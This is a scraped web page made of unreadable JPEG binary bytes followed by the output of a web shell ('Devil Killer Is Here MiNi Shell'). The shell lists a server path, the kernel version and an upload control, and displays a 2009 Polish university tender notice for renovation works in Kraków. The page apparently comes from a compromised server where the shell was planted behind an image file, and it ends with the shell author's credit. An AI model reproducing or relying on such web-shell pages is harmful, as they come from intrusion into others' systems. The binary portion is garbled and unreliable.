JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/63355-N-2009.html

<p class="kh_header"><b>Kraków: Wykonanie robót remontowo-budowlanych w pomieszczeniach nr 324, 325 i korytarzu dla Katedry Gleboznawstwa i Ochrony Gleb w budynku Collegium Godlewskiego Uniwersytetu  Rolniczego w Krakowie przy Al. Mickiewicza 21</b><br>
<b>Numer ogłoszenia: 63355 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie , al. Mickiewicza 21, 31-120 Kraków, woj. małopolskie, tel. 012 6624413, faks 012 6624410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ar.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowo-budowlanych w pomieszczeniach nr 324, 325 i korytarzu dla Katedry Gleboznawstwa i Ochrony Gleb w budynku Collegium Godlewskiego Uniwersytetu  Rolniczego w Krakowie przy Al. Mickiewicza 21.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót remontowo-budowlanych w pomieszczeniach nr 324, 325 i korytarzu dla Katedry Gleboznawstwa i Ochrony Gleb w budynku Collegium Godlewskiego Uniwersytetu  Rolniczego w Krakowie przy Al. Mickiewicza 21. 
2.	Zakres robót obejmuje:
1)  Roboty w zakresie branży budowlanej:
-	zerwanie posadzek z tworzyw sztucznych,
-	przygotowanie podłoża pod nowe posadzki / wylewka samopoziomująca/
-	wykonanie posadzek z wykładziny PCV zgrzewanej, homogenicznej typu Tarket, lub równoważnej gr. 2 mm , gat. I-y, chemoodporna - lab. nr 325 z wywinięciem na cokół	 
-	wymiana drzwi z futryną, klamkami i  szyldami oraz zamkiem na wkładkę wymiary 0,9*2,0, lab. 324
-	skucie tynków wewnętrznych
-	uzupełnienia i wykonanie nowych tynków wewnętrznych ścian 	
-	licowanie ścian płytkami na klej  
-	malowanie olejne ścian  
-	przetarcie tynków wewnętrznych ścian i sufitów 
-	malowanie emulsyjne ścian i sufitów
-	malowanie elementów metalowych / rury, grzejniki/
-	wywóz materiałów z rozbiórki i gruzu wraz z utylizacją 

2) Roboty w zakresie branży instalacji sanitarnej
-	demontaż likwidowanych urządzeń sanitarnych, baterii rurociągów i podejść wodnych i kanalizacyjnych , 
-	wykonanie nowych podejść wod.-kan. pod urządzenia sanitarne
-	montaż nowych urządzeń i armatury (umywalki, zlewu kwasoodpornego z tworzywa typu laboratoryjnego  z bateriami i syfonami , termy elektrycznej 10 litrowej montowanej w szafce pod zlewem) i na wspornikach bojler 80 litrowy
-	Wszystkie urządzenia powinny mieć oznaczenie klasy i być w pierwszym gatunku.  

Wentylacja: 
-	wykonanie  odciągu z nad urządzenia poprzez okap z blachy nierdzewnej o500/o200 i instalację przewodową z blachy nierdzewnej; instalacja przewodowa na III piętrze podłączona będzie do istniejącego przewodu prowadzonego w szach cie wentylacyjnym, wyprowadzonego na poddasze.
-	zainstalowanie wentylatora kanałowego np. typu VENT 160L lub równoważnego o wydajności L=450 m3/h P=200 Pa U=230V Ns=160 W z regulatorem REB 1.
-	powietrze wyrzucane poprzez wyrzutnię ścienną o160 zainstalowaną na poddaszu.

3)	Roboty w zakresie branży elektrycznej:
-	demontaż istniejących instalacji elektrycznych w remontowanych pomieszczeniach i korytarzu
-	wykonanie w ciągu korytarza w.l.z. do tablic instalowanych w przyszłości
-	wykonanie instalacji elektrycznej oświetlenia i gniazd wtykowych 
-	wykonanie instalacji elektrycznej zasilania wentylatora kanałowego na strychu
-	wykonanie  instalacji telefonicznej i komputerowej
-	zakup i montaż osprzętu elektrycznego , oraz opraw oświetleniowych
-	zakup i montaż tablic elektrycznych do modernizowanych  pomieszczeń 
-	zakup i montaż zabezpieczeń do nowych tablic bezpiecznikowych
-	zakup i montaż zabezpieczeń do istniejących tablic bezpiecznikowych
-	wykonanie pomiarów elektrycznych instalacji elektrycznej
-	wykonanie pomiarów natężenia oświetlenia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.44.21.00-8, 45.43.10.00-7, 45.43.21.11-5, 45.23.24.60-4, 45.33.12.10-1, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 i nie podlegają wykluczeniu oraz złożą dokumenty potwierdzające spełnianie tych warunków, z zastrzeżeniem art. 26 ust. 3 ustawy. W szczególności zamawiający wymaga, aby wykonawcy:
1)	posiadali uprawnienia do wykonywania określonej działalności lub czynności,
2)	posiadali niezbędną wiedzę i doświadczenie oraz dysponowali potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawili pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a zwłaszcza aby wykazali, że:
a)	w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonali co najmniej dwie roboty ogólnobudowlane wewnętrzne,  każda o cenie brutto robót nie mniejszej niż 50.000,00 zł oraz posiadają dokumenty potwierdzające, że roboty te zostały wykonane należycie. 
b)	dysponują lub będą dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia, należącymi do izby samorządu zawodowego i posiadającymi wymagane uprawnienia budowlane do pełnienia funkcji technicznych przy realizacji przedmiotowego zamówienia, tj.: 
-	dysponowanie osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej,
-	dysponowanie osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie instalacji wodociągowych i kanalizacyjnych.
-	dysponowanie osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych oraz świadectwo kwalifikacyjne D.
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia przez posiadanie polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż cena brutto złożonej oferty.
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
1. Zamawiający dokona oceny spełniania każdego z warunków na podstawie załączonych do oferty dokumentów, o których mowa w pkt. Informacja o oświadczeniach i dok.... Nie załączenie przez wykonawcę któregokolwiek z dokumentów uznane zostanie za nie spełnienie warunku, co skutkować będzie wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust 3 ustawy Prawo zamówień publicznych.
2.	Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Zgodnie z art. 24 ust. 1 ustawy i zgodnie z uregulowaniami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605 z późn. zm.) w celu:
1)	potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu z udziału w postępowaniu, zamawiający żąda załączenia do oferty:
a)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, dokument musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)	oświadczenia, zgodnego z art. 22 ust. 1 ustawy, o spełnianiu warunków udziału w postępowaniu zgodnie załącznikiem nr 2 do specyfikacji.
2)	potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda:
a)	wykazu - zgodnie z wzorem pn. Doświadczenie zawodowe stanowiącym załącznik nr 3 do specyfikacji - wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch  robót ogólnobudowlanych wewnętrznych, każda o cenie brutto robót nie mniejszej niż 50.000,00 zł, z podaniem ich wartości oraz daty, miejsca ich wykonania i zamawiającego,
UWAGA:	W przypadku wykonania robót budowlanych obejmujących także inny niż wymagany zakres robót, wykonawca winien w danej pozycji wykazu wyszczególnić również wartość robót ogólnobudowlanych wewnętrznych.
b)	dokumentów potwierdzających, że co najmniej dwie roboty wymienione w wykazie (o wymaganym zakresie i wartości) zostały wykonane należycie,
c)	wykazu osób - zgodnie z wzorem pn. Wykaz osób, którymi wykonawca dysponuje stanowiącym załącznik nr 4A do specyfikacji - będących w dyspozycji wykonawcy (np. na podstawie umowy o pracę), które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, przy czym wykonawca musi wykazać dysponowanie:
-	osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej - do pełnienia funkcji kierownika budowy przy realizacji przedmiotowego zamówienia
-	osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie instalacji wodociągowych i kanalizacyjnych - do pełnienia funkcji kierownika robót sanitarnych przy realizacji przedmiotowego zamówienia
-	osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych oraz świadectwo kwalifikacyjne D - do pełnienia funkcji kierownika robót elektrycznych przy realizacji przedmiotowego zamówienia
d)	 i/lub wykazu osób - zgodnie z wzorem pn. Wykaz osób, którymi wykonawca będzie dysponował stanowiącym załącznik nr 4B do specyfikacji - którymi będzie dysponował  wykonawca, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, przy czym wykonawca musi wykazać, że będzie dysponował:
-	osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej - do pełnienia funkcji kierownika budowy przy realizacji przedmiotowego zamówienia
-	osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie instalacji wodociągowych i kanalizacyjnych - do pełnienia funkcji kierownika robót sanitarnych przy realizacji przedmiotowego zamówienia
-	osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych oraz świadectwo kwalifikacyjne D - do pełnienia funkcji kierownika robót elektrycznych przy realizacji przedmiotowego zamówienia
e)	W odniesieniu do osób wymienionych w załączniku nr 4B wymagane jest załączenie do oferty pisemne zobowiązanie podmiotów, które dysponują tymi osobami do ich udostępnienia. W przypadku prowadzenia przez te osoby samodzielnej działalności należy do oferty dołączyć pisemne zobowiązanie tych osób do podjęcia się realizacji określonych zadań. 
f)	kopie uprawnień budowlanych w wymaganych specjalności dla wymienionych w wykazie (wykazach)  osób - zgodnie z pkt. 2c i/lub 2d -  oraz, dla każdej z wymienionych osób, zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego zgodnie z ustawą Prawo budowlane. 
3)	potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - zamawiający żąda polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż cena brutto złożonej oferty.

2.	W przypadku wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej obowiązuje załączenie odpowiednich dokumentów zgodnych z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz.U. Nr 87, poz. 604 z późn. zm.) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. 
3.	W przypadku składania ofert wspólnych: dokumenty wymienione w pkt. 1.1 składa każdy z wykonawców; natomiast dokumenty wymienione w pkt. 1.2 i 1.3 mogą złożyć wszyscy wykonawcy łącznie. 
4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców, zgodnie z art. 23 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ar.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Roniczy im. Hugona Kołłątaja 
Dział Zamówien Publicznych - pokój nr 37
Al. Mickiewicza 21 
31-120 Kraków.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 11:00, miejsce: Uniwersytet Roniczy im. Hugona Kołłątaja 
Dział Zamówien Publicznych - pokój nr 37
Al. Mickiewicza 21 
31-120 Kraków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com